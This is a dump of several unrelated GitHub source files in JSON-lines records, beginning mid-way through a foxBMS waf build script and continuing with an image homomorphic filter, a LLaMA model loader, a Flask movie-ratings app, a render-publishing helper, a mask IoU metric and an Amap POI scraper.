self.outputs[0].change_ext('.error').delete()\n                self.outputs[0].write(std_out)\n\n    def set_out_dir(bld, src_node, out_dir='cpplint', ext='.cpplint'):\n        my_bld_node = bld.bldnode.make_node(out_dir)\n        rp = src_node.get_bld().relpath()\n        bld_target = 
my_bld_node.make_node(rp + ext)\n\n        return bld_target\n\n    @TaskGen.feature('run_cpplint')\n    def add_cpplint(self):\n        srcs = bld.path.ant_glob(self.env.cpplint_src, excl=self.env.cpplint_excl)\n        for src_file in srcs:\n            tgt = set_out_dir(bld, src_file)\n            self.create_task('tsk_cpplint', src=src_file, tgt=tgt)\n\n    with open(bld.env.CPPLINT_CONF, 'r') as stream:\n        try:\n            cpplint_conf = yaml.load(stream, Loader=YAMLLoader)\n        except yaml.YAMLError as exc:\n            bld.fatal(exc)\n    src = cpplint_conf['files']['include']\n    filters = cpplint_conf['filter']\n    excl_tmp = cpplint_conf['files']['exclude']\n    excl = []\n    for x in excl_tmp:\n        if not x.startswith('**/'):\n            excl.append('**/' + x)\n        else:\n            excl.append(x)\n\n    bld.env.cpplint_options = ['--output={}'.format(cpplint_conf['output'])]\n    bld.env.cpplint_options += ['--linelength={}'.format(cpplint_conf['linelength'])]\n    bld.env.cpplint_options += ['--filter=' + ','.join(filters)]\n    bld.env.cpplint_src = src\n    bld.env.cpplint_excl = excl\n    bld(features='run_cpplint')\n\n\ndef sphinx(bld):\n    import sys\n    import logging\n    from waflib import Logs\n    if not bld.env.SPHINX_BUILD:\n        bld.fatal('ERROR: cannot build documentation (\\'sphinx-build\\' is not '\n                  'found in PATH)')\n    log_file = os.path.join(bld.bldnode.abspath(), 'sphinx.log')\n    bld.logger = Logs.make_logger(log_file, out)\n    hdlr = logging.StreamHandler(sys.stdout)\n    formatter = logging.Formatter('%(message)s')\n    hdlr.setFormatter(formatter)\n    bld.logger.addHandler(hdlr)\n    bld(features='sphinx',\n        config=bld.path.find_node(bld.env.sphinx_conf_path),\n        outdir='documentation',\n        version=bld.env.version,\n        )\n\n\ndef clean_all(bld):\n    \"\"\"cleans all parts of the project\"\"\"\n    from waflib import Options\n    commands_after = Options.commands\n    Options.commands = ['clean_primary', 'clean_secondary',\n                        'clean_primary_bare', 'clean_secondary_bare',\n                        'clean_libs']\n    Options.commands += commands_after\n\n\ndef build_all(bld):\n    \"\"\"builds all parts of the project (binaries and documentation)\"\"\"\n    from waflib import Options\n    commands_after = Options.commands\n    Options.commands = []\n    if bld.options.libs:\n        Options.commands = ['build_libs']\n    Options.commands += ['build_primary', 'build_secondary',\n                         'build_primary_bare', 'build_secondary_bare',\n                         'doxygen_primary', 'doxygen_secondary',\n                         'doxygen_primary_bare', 'doxygen_secondary_bare',\n                         'sphinx']\n    Options.commands += commands_after\n\n\ndef dist(conf):\n    conf.base_name = 'foxbms'\n    conf.algo = 'tar.gz'\n    conf.excl = out\n    conf.excl += ' .ws **/tools/waf*.*.**-* .lock-*'\n    conf.excl += ' **/.git **/.gitignore **/.gitattributes '\n    conf.excl += ' **/*.tar.bz2 **/*.tar.gz **/*.pyc '\n\n\ndef distcheck_cmd(self):\n    import shlex\n    cfg = []\n    if Options.options.distcheck_args:\n        cfg = shlex.split(Options.options.distcheck_args)\n    else:\n        cfg = [x for x in sys.argv if x.startswith('-')]\n    cmd = [sys.executable, sys.argv[0], 'configure', 'build_primary', 'build_secondary', 'doxygen_primary', 'doxygen_secondary', 'sphinx'] + cfg\n    return cmd\n\n\ndef check_cmd(self):\n    import tarfile\n    with tarfile.open(self.get_arch_name()) as t:\n        for x in t:\n            t.extract(x)\n    cmd = self.make_distcheck_cmd()\n    ret = Utils.subprocess.Popen(cmd, cwd=self.get_base_name()).wait()\n    if ret:\n        raise Errors.WafError('distcheck failed with code %r' % ret)\n\n\ndef distcheck(conf):\n    \"\"\"creates a tarball from the source directory and tries to run a build\"\"\"\n    from waflib import Scripting\n    Scripting.DistCheck.make_distcheck_cmd = distcheck_cmd\n    Scripting.DistCheck.check = 
check_cmd\n conf.base_name = 'foxbms'\n conf.excl = out\n conf.excl += ' .ws **/tools/waf*.*.**-* .lock-*'\n conf.excl += ' **/.git **/.gitignore **/.gitattributes '\n conf.excl += ' **/*.tar.bz2 **/*.tar.gz **/*.pyc '\n\n\nclass tsk_cal_chksum(Task.Task):\n def keyword(self):\n return 'Calculating checksum'\n after = ['tsk_binflashheadergen', 'tsk_binflashgen']\n color = 'RED'\n\n def run(self):\n import binascii\n import struct\n\n with open(self.inputs[1].abspath(), 'rb') as pheader_buffer_file:\n pheader_buffer_file.seek(self.generator.env.flash_begin_adr ^ self.generator.env.flash_header_adr)\n checksum_start_address = struct.unpack('i', pheader_buffer_file.read(4))[0]\n pheader_buffer_file.seek(self.generator.env.flash_end_adr ^ self.generator.env.flash_header_adr)\n checksum_end_address = struct.unpack('i', pheader_buffer_file.read(4))[0]\n chksum_calc_length = checksum_end_address - checksum_start_address + 1\n\n prg_txt = self.inputs[0].read('rb')\n if not chksum_calc_length == len(prg_txt):\n self.generator.fatal('Checksum calculation error')\n\n checksum = binascii.crc32(prg_txt, 0) & 0xFFFFFFFF\n output = f'checksum: 0x{checksum:X}'\n self.outputs[0].write(output + '\\n')\n print(output)\n\n\nclass tsk_wrt_chksum(Task.Task):\n def keyword(self):\n return 'Writing checksum'\n after = ['tsk_cal_chksum']\n color = 'RED'\n\n def run(self):\n import shutil\n import struct\n\n checksum_struct_name = 'ver_sw_validation'\n checksum_position_in_struct = 0x10\n date_position_in_struct = 0xA0\n time_position_in_struct = 0xAC\n\n checksum_data = yaml.load(self.inputs[1].read(), Loader=yaml.Loader)\n checksum = hex(checksum_data['checksum'])\n\n if checksum.endswith('L'):\n checksum = checksum[:-1]\n cmd = Utils.subst_vars('${OBJDUMP} --section=.flashheader -h', self.env)\n cmd += f' {self.inputs[0].abspath()}'\n std_out, std_err = self.generator.bld.cmd_and_log(cmd, output=waflib.Context.BOTH)\n sectionAttributes = dict(zip(std_out.splitlines()[4].split(), std_out.splitlines()[5].split()))\n\n cmd = Utils.subst_vars('${OBJDUMP} --section=.flashheader -t', self.env)\n cmd += f' {self.inputs[0].abspath()}'\n std_out, std_err = self.generator.bld.cmd_and_log(cmd, output=waflib.Context.BOTH)\n std_out = [line for line in std_out.splitlines() if checksum_struct_name in line]\n symbolAttributes = std_out[0].split()\n\n positionInSection = int(symbolAttributes[0], 16) - int(sectionAttributes['LMA'], 16)\n\n shutil.copy(self.inputs[0].abspath(), self.outputs[0].abspath())\n\n # calculate offset of checksum in ELF file\n offset = int(sectionAttributes['File'], 16) + positionInSection + checksum_position_in_struct\n # create single bytes from checksum string\n bytes = struct.pack('I', int(checksum, 16))\n # write checksum bytes to calculated offset in ELF file\n with open(self.outputs[0].abspath(), 'r+b') as fh:\n fh.seek(offset)\n fh.write(bytes)\n\n # calculate offset of date in ELF file\n offset = int(sectionAttributes['File'], 16) + positionInSection + date_position_in_struct\n # create single bytes from date string\n d = datetime.datetime.now()\n bytes = d.strftime('%b %d %Y').encode()\n # write date bytes to calculated offset in ELF file\n with open(self.outputs[0].abspath(), 'r+b') as fh:\n fh.seek(offset)\n fh.write(bytes)\n\n # calculate offset of time in ELF file\n offset = int(sectionAttributes['File'], 16) + positionInSection + time_position_in_struct\n # create single bytes from time string\n bytes = d.strftime('%H:%M:%S').encode()\n # write time bytes to calculated offset in ELF file\n 
with open(self.outputs[0].abspath(), 'r+b') as fh:\n fh.seek(offset)\n fh.write(bytes)\n\n\n@TaskGen.feature('chksum')\n@TaskGen.before('add_hexgen_task')\n@TaskGen.after('apply_link', 'add_bingen_task')\ndef add_chksum_task(self):\n try:\n link_task = self.link_task\n binflashgen = self.binflashgen_task\n binflashheadergen = self.binflashheadergen_task\n except AttributeError:\n return\n self.cal_chksum_task = self.create_task('tsk_cal_chksum',\n src=[binflashgen.outputs[0],\n binflashheadergen.outputs[0]],\n tgt=self.path.get_bld().make_node('checksum.yml'))\n self.wrt_chksum_task = self.create_task('tsk_wrt_chksum',\n src=[link_task.outputs[0], self.cal_chksum_task.outputs[0]],\n tgt=link_task.outputs[0].change_ext(''))\n\n\nclass strip(Task.Task):\n after = ['tsk_binflashheaderpatch']\n run_str = '${STRIP} ${SRC} -o ${TGT}'\n color = 'BLUE'\n\n\n@TaskGen.feature('strip')\n@TaskGen.after('add_chksum_task')\n@TaskGen.after('add_bingen_task')\ndef add_strip_task(self):\n try:\n link_task = self.link_task\n except AttributeError:\n return\n self.create_task('strip',\n src=link_task.outputs[0],\n tgt=link_task.outputs[0].change_ext('_nd.elf'))\n\n\nclass tsk_hexgen(Task.Task):\n def keyword(self):\n return 'Creating hex file'\n after = ['tsk_wrt_chksum']\n run_str = '${OBJCOPY} -R .ext_sdramsect_bss -R .bkp_ramsect -O ihex ${SRC} ${TGT}'\n color = 'CYAN'\n\n\n@TaskGen.feature('hexgen')\n@TaskGen.after('add_chksum_task')\ndef add_hexgen_task(self):\n try:\n wrt_chksum_task = self.wrt_chksum_task\n except AttributeError:\n return\n self.hexgen = self.create_task('tsk_hexgen',\n src=wrt_chksum_task.outputs[0],\n tgt=wrt_chksum_task.outputs[0].change_ext('.hex'))\n\n\nclass tsk_binflashheaderpatch(Task.Task):\n def keyword(self):\n return 'Patching bin flashheader'\n after = ['tsk_wrt_chksum']\n run_str = '${OBJCOPY} -j .flashheader -O binary ${SRC} ${TGT}'\n color = 'RED'\n\n\nclass tsk_binflashheadergen(Task.Task):\n def keyword(self):\n return 'Creating bin flashheader'\n run_str = '${OBJCOPY} -j .flashheader -O binary ${SRC} ${TGT}'\n color = 'RED'\n\n\nclass tsk_binflashgen(Task.Task):\n def keyword(self):\n return 'Creating bin flash'\n run_str = '${OBJCOPY} -R .ext_sdramsect_bss -R .bkp_ramsect -R .flashheader -O binary ${SRC} ${TGT}'\n color = 'RED'\n\n\n@TaskGen.feature('bingen')\n@TaskGen.before('add_chksum_task')\n@TaskGen.after('apply_link')\ndef add_bingen_task(self):\n try:\n link_task = self.link_task\n except AttributeError:\n return\n self.binflashgen_task = self.create_task('tsk_binflashgen', src=link_task.outputs[0], tgt=link_task.outputs[0].change_ext('_flash.bin', '.elf.unpatched'))\n self.binflashheadergen_task = self.create_task('tsk_binflashheadergen', src=link_task.outputs[0], tgt=link_task.outputs[0].change_ext('_flashheader.bin.unpatched', '.elf.unpatched'))\n\n\n@TaskGen.feature('binpatch')\n@TaskGen.after('add_chksum_task')\n@TaskGen.after('apply_link')\ndef add_patch_bin_task(self):\n try:\n wrt_chksum_task = self.wrt_chksum_task\n except AttributeError:\n return\n self.binflashheaderpatch_task = self.create_task('tsk_binflashheaderpatch', src=wrt_chksum_task.outputs[0], tgt=wrt_chksum_task.outputs[0].change_ext('_flashheader.bin'))\n\n\nimport waflib.Tools.asm # noqa: E402 import before redefining\nfrom waflib.TaskGen import extension # noqa: E402\n\n\nclass Sasm(Task.Task):\n color = 'BLUE'\n run_str = '${CC} ${ASMFLAGS} ${CPPPATH_ST:INCPATHS} -o ${TGT} ${SRC[0].abspath()}'\n\n\n@extension('.s')\ndef asm_hook(self, node):\n name = 'Sasm'\n out = 
node.change_ext('.o')\n task = self.create_task(name, node, out)\n try:\n self.compiled_tasks.append(task)\n except AttributeError:\n self.compiled_tasks = [task]\n return task\n\n\nclass size(Task.Task):\n def keyword(self):\n return 'Calculating size'\n before = ['tsk_cal_chksum']\n color = 'BLUE'\n\n def run(self):\n cmd = Utils.subst_vars('${SIZE}', self.env) + f' {self.inputs[0].abspath()}'\n x = self.outputs[0].path_from(self.generator.path)\n out, err = self.generator.bld.cmd_and_log(cmd, output=waflib.Context.BOTH, quiet=waflib.Context.STDOUT)\n self.generator.path.make_node(x).write(out)\n if err:\n Logs.error(err)\n\n\n@TaskGen.feature('size')\n@TaskGen.after('apply_link')\ndef process_sizes(self):\n if getattr(self, 'link_task', None) is None:\n return\n\n objects_to_size = []\n objects_to_size.extend(self.link_task.inputs)\n objects_to_size.extend(self.link_task.outputs)\n\n for node in objects_to_size:\n out = node.change_ext('.size.log')\n self.create_task('size', node, out)\n\n\nclass tsk_check_includes(Task.Task):\n before = ['size']\n color = 'PINK'\n\n def run(self):\n import os\n import collections\n err_msg = f'{self.inputs[0].abspath()} introduces the following errors:\\n'\n err_ctn_missing = 0\n err_ctn_duplicates = 0\n incs = self.generator.bld.env.INCLUDES + [x if os.path.isabs(x) else os.path.join(self.generator.path.abspath(), x) for x in self.generator.includes]\n Logs.debug('\\n'.join(incs))\n for x in incs:\n if not os.path.isdir(x):\n err_ctn_missing += 1\n if err_ctn_missing == 1:\n err_msg += 'The following include directories do not exist:\\n'\n err_msg += f'{x}\\n'\n if not (sorted(incs) == sorted(list(set(incs)))):\n err_ctn_duplicates += 1\n if err_ctn_duplicates == 1:\n err_msg += 'There are duplicate includes:\\n'\n duplicates = [item for item, count in collections.Counter(incs).items() if count > 1]\n for p in duplicates:\n err_msg += f'{p}\\n'\n if (err_ctn_missing + err_ctn_duplicates):\n Logs.error(err_msg)\n self.generator.bld.fatal('There are include errors.')\n else:\n self.outputs[0].write(f'wscript: \"{self.inputs[0]}\"\\n')\n if incs:\n self.outputs[0].write('includes:\\n - \"', 'a')\n self.outputs[0].write('\"\\n - \"'.join(incs) + '\"\\n', 'a+')\n else:\n self.outputs[0].write('includes:\\n', 'a+')\n\n\n@TaskGen.feature('check_includes')\n@TaskGen.before('process_rule')\ndef add_check_includes(self):\n src = self.path.make_node('wscript')\n tgt = src.change_ext('.includes.yml')\n self.create_task('tsk_check_includes', src=src, tgt=tgt)\n\n\nclass copy_libs(Task.Task):\n def keyword(self):\n return 'Copying'\n\n def run(self):\n import shutil\n shutil.copyfile(self.inputs[0].abspath(), self.outputs[0].abspath())\n\n\n@TaskGen.feature('copy_libs')\n@TaskGen.after('apply_link')\ndef add_copy_libs(self):\n if getattr(self, 'link_task', None) is None:\n return\n\n for src in self.link_task.outputs:\n tgt = os.path.normpath(src.abspath())\n tgt = os.path.join(self.env.LIB_DIR_LIBS, os.path.basename(tgt))\n tgt = self.path.find_or_declare(tgt)\n self.create_task('copy_libs', src=src, tgt=tgt)\n","repo_name":"foxBMS/foxbms-1","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":38571,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"40"} +{"seq_id":"6073122396","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimage = cv2.imread('12345.jfif', 0)\nplt.imshow(image, cmap='gray'), plt.axis('off')\nplt.show()\nM, N = image.shape\nP, Q = 2*M, 2*N\n# Zero 
padding\npadded_image = np.zeros((P, Q))\npadded_image[:M, :N] = image\npadded_image_new = np.zeros((P, Q))\n# Centering\nfor x in range(P):\n    for y in range(Q):\n        padded_image_new[x, y] = padded_image[x, y] * ((-1) ** (x + y))\n\ndft2d = np.fft.fft2(padded_image_new)\ndft2d_ = np.log(np.abs(dft2d))\n# Homomorphic filtering implementation\ndef HMMF(image, cutoff, rh, rl):\n    M, N = image.shape\n    H, D = np.zeros((M, N)), np.zeros((M, N))\n\n    U0 = int(M/2)\n    V0 = int(N/2)\n    D0 = cutoff\n\n    A, B = rh, rl\n\n    for u in range(M):\n        for v in range(N):\n            u2 = np.power(u, 2)\n            v2 = np.power(v, 2)\n            D[u, v] = np.sqrt(u2 + v2)\n\n    for u in range(M):\n        for v in range(N):\n            u_ = np.abs(u - U0)\n            v_ = np.abs(v - V0)\n            H[u, v] = (A - B) * (1 - np.exp(-D[u_, v_] ** 2 / (2 * (D0 ** 2)))) + B\n# multiply the Gaussian high-pass filter by (r_H - r_L) and add r_L, attenuating i(x, y) and boosting r(x, y) to enhance image details\n    return H\n\n\nhmmf = HMMF(dft2d, cutoff=30, rh=1.25, rl=0.75)\nplt.imshow(hmmf, cmap='gray'), plt.axis('off')\nplt.show()\n\nG = np.multiply(dft2d, hmmf)\ndft2d_ = np.log(np.abs(G))\nplt.imshow(dft2d_.real, cmap='gray'), plt.axis('off')\nplt.show()\n# Inverse Fast Fourier Transform\nidft2d = np.fft.ifft2(G)\n\n# De-centering\nfor x in range(P):\n    for y in range(Q):\n        idft2d[x, y] = idft2d[x, y] * ((-1) ** (x + y))\n# Remove zero-padding\nidft2d = idft2d[:M, :N]\nplt.imshow(idft2d.real, cmap='gray'), plt.axis('off')\nplt.show()\n","repo_name":"beaglemong/Video_System_Capstone_Design","sub_path":"homomorphic_filter.py","file_name":"homomorphic_filter.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"14308974348","text":"import torch\nfrom peft import PeftModel\nfrom transformers import LlamaTokenizer, LlamaForCausalLM\n\nfrom auto_gptq import AutoGPTQForCausalLM, BaseQuantizeConfig\n\ndef load_model(\n    base, \n    finetuned, \n    gptq,\n    gptq_base,\n    mode_cpu,\n    mode_mps,\n    mode_full_gpu,\n    mode_8bit,\n    mode_4bit,\n    mode_gptq,\n    mode_mps_gptq,\n    mode_cpu_gptq,\n    force_download_ckpt,\n    local_files_only\n):\n    tokenizer = LlamaTokenizer.from_pretrained(\n        base,local_files_only=local_files_only\n    )\n    tokenizer.pad_token_id = 0\n    tokenizer.padding_side = \"left\"\n\n    if not multi_gpu:\n        model = LlamaForCausalLM.from_pretrained(\n            base,\n            load_in_8bit=mode_8bit,\n            load_in_4bit=mode_4bit,\n            device_map=\"auto\",\n            local_files_only=local_files_only\n        )\n        \n        model = PeftModel.from_pretrained(\n            model, \n            finetuned, \n            # force_download=force_download_ckpt,\n            device_map={'': 0}\n        )\n        return model, tokenizer\n    else:\n        model = LlamaForCausalLM.from_pretrained(\n            base,\n            load_in_8bit=mode_8bit,\n            load_in_4bit=mode_4bit, \n            torch_dtype=torch.float16,\n            device_map=\"auto\",\n            local_files_only=local_files_only\n        )\n        \n        model = PeftModel.from_pretrained(\n            model, \n            finetuned, \n            # force_download=force_download_ckpt,\n            torch_dtype=torch.float16\n        )\n        model.half()\n        return model, tokenizer \n\n","repo_name":"deep-diver/LLM-As-Chatbot","sub_path":"models/llama_rlhf.py","file_name":"llama_rlhf.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":3121,"dataset":"github-code","pt":"40"}
+{"seq_id":"14615330378","text":"import os\nimport sys\n\n#\n# Complete the timeConversion function below.\n#\ndef timeConversion(s):\n    # Write your code here.\n    # Slice parts of the time\n    ap = s[len(s)-2:len(s)]\n    hour = s[ : 2]\n    minute = s[3 : 5]\n    secs = s[6 : 8]\n    if ap == \"PM\" and hour != \"12\":\n        
return(\"{}:{}:{}\".format(int(hour)+12, minute, secs))\n    elif ap == \"AM\" and hour == \"12\":\n        return(\"00:{}:{}\".format(minute, secs))\n    else:\n        return(\"{}:{}:{}\".format(hour, minute, secs))\n\n\nprint(timeConversion(\"11:05:45PM\"))","repo_name":"josenriagu/fluffy-fiesta","sub_path":"_hackerrrank/timeConversion.py","file_name":"timeConversion.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"29235012471","text":"import torch\n\ndef mask_iou(lhs_mask, rhs_mask):\n    r\"\"\"Compute the Intersection over Union of two segmentation masks.\n\n    Args:\n        lhs_mask (torch.FloatTensor):\n            A segmentation mask, of shape\n            :math:`(\\text{batch_size}, \\text{height}, \\text{width})`.\n        rhs_mask (torch.FloatTensor):\n            A segmentation mask, of shape\n            :math:`(\\text{batch_size}, \\text{height}, \\text{width})`.\n\n    Returns:\n        (torch.FloatTensor): The IoU loss, as a torch scalar.\n    \"\"\"\n    batch_size, height, width = lhs_mask.shape\n    assert rhs_mask.shape == lhs_mask.shape\n    sil_mul = lhs_mask * rhs_mask\n    sil_add = lhs_mask + rhs_mask\n    iou_up = torch.sum(sil_mul.reshape(batch_size, -1), dim=1)\n    iou_down = torch.sum((sil_add - sil_mul).reshape(batch_size, -1), dim=1)\n    iou_neg = iou_up / (iou_down + 1e-10)\n    mask_loss = 1.0 - torch.mean(iou_neg)\n    return mask_loss\n","repo_name":"NVIDIAGameWorks/kaolin","sub_path":"kaolin/metrics/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":3989,"dataset":"github-code","pt":"40"}
+{"seq_id":"20600701492","text":"\"\"\"Server for movie ratings app.\"\"\"\n\nfrom flask import (Flask,render_template,request,flash,session,redirect)\nfrom model import connect_to_db\nimport crud\nfrom jinja2 import StrictUndefined\n\napp = Flask(__name__)\napp.secret_key = \"dev\"\napp.jinja_env.undefined = StrictUndefined\n\n\n# Replace this with routes and view functions!\n@app.route('/')\ndef homepage():\n    '''View homepage'''\n    return render_template('homepage.html')\n\n@app.route('/movies')\ndef all_movies():\n    movies = crud.get_all_movies()\n    return render_template('all_movies.html',movies=movies)\n\n\n@app.route('/movies/<movie_id>')\ndef show_movie(movie_id):\n    \"\"\"Show details on a particular movie.\"\"\"\n\n    movie = crud.get_movie_by_id(movie_id)\n\n    return render_template('movie_details.html', movie=movie)\n\n\n@app.route('/users')\ndef all_users():\n    users = crud.get_all_users()\n    return render_template('all_users.html',users=users)\n\n@app.route('/users',methods=['POST'])\ndef register_user(): \n    '''Create a new user if the user does not already exist'''\n    email = request.form.get('email')\n    pwd = request.form.get('password') \n    print(email)\n    print(pwd)\n    user = crud.get_user_by_email(email)\n    print(user)\n    if user:\n        flash('This email is already used. Try with a different email')\n    else:\n        crud.create_user(email,pwd)\n        flash('Account created! Please log in')\n    return redirect('/')\n\n\n\n\n@app.route('/users/<user_id>')\ndef show_user(user_id):\n    \"\"\"Show details on a particular User.\"\"\"\n\n    user = crud.get_user_by_id(user_id)\n\n    return render_template('user_details.html', user=user)\n\nif __name__ == '__main__':\n    connect_to_db(app)\n    app.run(host='0.0.0.0', debug=True)\n","repo_name":"Supreethamg/Movie-Ratings-App","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"71794549240","text":"import os\nfrom . import pblChk\nfrom shared import verbose\n\n\n#Processes publish options arriving from the different publish modules\n\n\n#######################GENERIC PUBLISHING OPTIONS PROCESSING########################\n####################################################################################\n#processes publish options and naming convention variables\ndef prc(pblTo, subset, assetType, prefix, convention, suffix):\n\tassetPblName = prefix + convention + suffix\n\t#if subset:\n\tassetDir = os.path.join(assetType, subset, convention)\n\t#else:\n\t#\tassetDir = os.path.join(assetType, assetPblName)\n\tpblDir = os.path.join(pblTo, assetDir)\n\treturn assetPblName, assetDir, pblDir\n\n\n###################RENDER PUBLISHING SPECIFIC OPTIONS PROCESSING####################\n####################################################################################\n#splits a sequence file and returns the different render components\ndef render_split(filename):\n#\tif filename.startswith('.'):\n#\t\treturn\n#\tif not pblChk.paddingChk(filename):\n#\t\treturn\n#\tnameBody, padding, extension = filename.split('.')\n#\treturn nameBody, padding, extension\n\n\t# Parse filename\n\ttry:\n\t\tbase, ext = os.path.splitext(filename)\n\t\tprefix, framenumber = base.rsplit('.', 1)\n\t\tpadding = len(framenumber)\n\t\tframenumber_int = int(framenumber)\n\t\treturn prefix, framenumber, ext\n\texcept ValueError:\n\t\tverbose.error(\"Could not parse sequence.\")\n\t\treturn # False, False, False # need to return tuple to match successful return type\n\n\n#processes a dictionary contaning the format layer_pass:full/sequence/path. Returns the path with the old file name and with the name convention applied\ndef renderName_prc(key, convention, file_):\n\t\tfile_split = render_split(file_)\n\t\tif file_split:\n\t\t\tprcFile = file_.replace(key, convention)\n\t\t\treturn prcFile\n\t\telse:\n\t\t\treturn\n\t\t\n#processes the provided render path and returns a dictionary of layer and respective full sequence path\ndef renderPath_prc(renderPath):\n\texpRenderPath = os.path.expandvars(renderPath)\n\tdirContents = sorted(os.listdir(expRenderPath))\n\trenderDic = {}\n\tseqChkLs = []\n\tfor content in dirContents:\n\t\ttry:\n\t\t\texpLayerPath = os.path.join(expRenderPath, content)\n\t\t\tif os.path.isdir(expLayerPath):\n\t\t\t\tif content not in renderDic.keys():\n\t\t\t\t\tfileContentLs = os.listdir(expLayerPath)\n\t\t\t\t\tfor file_ in fileContentLs:\n\t\t\t\t\t\tif pblChk.paddingChk(file_):\n\t\t\t\t\t\t\trenderDic[content] = os.path.join(renderPath, content)\n\t\t\t\t\t\t\tif content in seqChkLs:\n\t\t\t\t\t\t\t\tseqChkLs.remove(content)\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif content not in seqChkLs:\n\t\t\t\t\t\t\t\tseqChkLs.append(content)\n\t\texcept TypeError:\n\t\t\tcontinue\n\t\t\t\n\tif len(seqChkLs) > 0:\n\t\tverbose.noSeq(seqChkLs)\n\t\t\t\t\n\tif not renderDic:\n\t\treturn\n\telse:\n\t\treturn renderDic\n\t\t\t\n\t\t\n####################DAILY PUBLISHING SPECIFIC OPTIONS PROCESSING####################\n####################################################################################\n\ndef dailyPath_prc(path):\n\t\"\"\" Processes the provided path and returns a dictionary of layer and respective full sequence path.\n\t\tRewrite or remove this function...\n\t\"\"\"\n\texpPath = os.path.expandvars(path)\n\tfilePath, file_ = os.path.split(expPath)\n\tfileSplit = render_split(file_)\n\trenderDic = {}\n\tif fileSplit:\n\t\tnameBody, padding, 
extension = render_split(file_)\n\t\trenderDic[nameBody] = filePath\n\t\t#print(nameBody, padding, extension)\n\t\treturn renderDic\n\telse:\n\t\treturn\n\n","repo_name":"mjbonnington/icarus-gps","sub_path":"publish/pblOptsPrc.py","file_name":"pblOptsPrc.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"25248965003","text":"from urllib.parse import quote\nfrom urllib import request\nimport os\nos.system('pip install json')\nos.system('pip install xlwt')\nos.system('pip install xlrd')\nos.system('pip install xlutils')\nimport json\nimport xlwt\nfrom xlrd import open_workbook\nfrom xlutils.copy import copy\nimport winreg\n\n# Get the desktop path\nregkey=winreg.OpenKey(winreg.HKEY_CURRENT_USER,r'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders')\npath=winreg.QueryValueEx(regkey, \"Desktop\")[0]+'\\\\'\n\n# The following three lines can be modified: the first can be changed to your own API key, the second is the city, the third is the keyword\namap_web_key = '2d68d475f1032ee055a9efa1f8bbf119'\ncityname = \"绍兴\"\nclassfiled = \"培训机构\"+\"柯桥区\"\n# By default an Excel file named after the city is created on the desktop\nfilename = path + cityname + '.xls' \n# Request URLs\npoi_search_url = \"http://restapi.amap.com/v3/place/text\"\npoi_boundary_url = \"https://ditu.amap.com/detail/get/detail\"\n \n \n# Fetch POI data by city name and category keyword\ndef getpois(cityname, keywords):\n    i = 1\n    poilist = []\n    while True: # use a while loop to fetch the data page by page\n        result = getpoi_page(cityname, keywords, i)\n        result = json.loads(result) # convert the string to JSON\n\t\t\n\t\t# what follows depends on where the required data sits in the JSON response\n        if result['status'] != '1':\n            return\n        if len(result['pois']) < 20:\n            hand(poilist, result)\n            write_to_excel(poilist, cityname, keywords)\n            break\n        hand(poilist, result)\n        if i == 1:\n            write_to_excel(poilist, cityname, keywords)\n        else:\n            contact_read_excel(poilist)\n        i = i + 1\n    return poilist\n \n \n# Append data to the Excel file\ndef contact_read_excel(poilist):\n    rexcel = open_workbook(filename)  # read an existing Excel file with xlrd\n    rows = rexcel.sheets()[0].nrows  # get the number of rows already present via xlrd\n    excel = copy(rexcel)  # convert the xlrd object into an xlwt object with xlutils.copy\n    table = excel.get_sheet(0)  # get the sheet to operate on via the xlwt object\n    # print('existing rows', rows)\n    for i in range(len(poilist)):\n        table.write(rows + i, 0, poilist[i]['id'])\n        table.write(rows + i, 1, poilist[i]['name'])\n        table.write(rows + i, 2, poilist[i]['address'])\n        table.write(rows + i, 3, poilist[i]['location'])\n        table.write(rows + i, 4, poilist[i]['tel'])\n        table.write(rows + i, 5, poilist[i]['adname'])\n    excel.save(filename)  # save via xlwt, overwriting the original Excel file\n \n \n# Write the data to Excel\ndef write_to_excel(poilist, cityname, classfield):\n    # a Workbook object, which is equivalent to creating an Excel file\n    book = xlwt.Workbook(encoding='utf-8', style_compression=0)\n    sheet = book.add_sheet(classfield, cell_overwrite_ok=True)\n    # first row (column headers)\n    sheet.write(0, 0, 'id')\n    sheet.write(0, 1, 'name')\n    sheet.write(0, 2, 'address')\n    sheet.write(0, 3, 'location')\n    sheet.write(0, 4, 'tel')\n    sheet.write(0, 5, 'adname')\n    for i in range(len(poilist)):\n        sheet.write(i + 1, 0, poilist[i]['id'])\n        sheet.write(i + 1, 1, poilist[i]['name'])\n        sheet.write(i + 1, 2, poilist[i]['address'])\n        sheet.write(i + 1, 3, poilist[i]['location'])\n        sheet.write(i + 1, 4, poilist[i]['tel'])\n        sheet.write(i + 1, 5, poilist[i]['adname'])\n    book.save(filename)\n \n \n# Collect the returned POI data into the list\ndef hand(poilist, result):\n    # result = json.loads(result) # convert the string to JSON\n    pois = result['pois']\n    for i in range(len(pois)):\n        poilist.append(pois[i])\n \n \n# Fetch POIs for a single page\ndef getpoi_page(cityname, keywords, page):\n\t# request URL and parameters\n    req_url = poi_search_url + \"?key=\" + amap_web_key + 
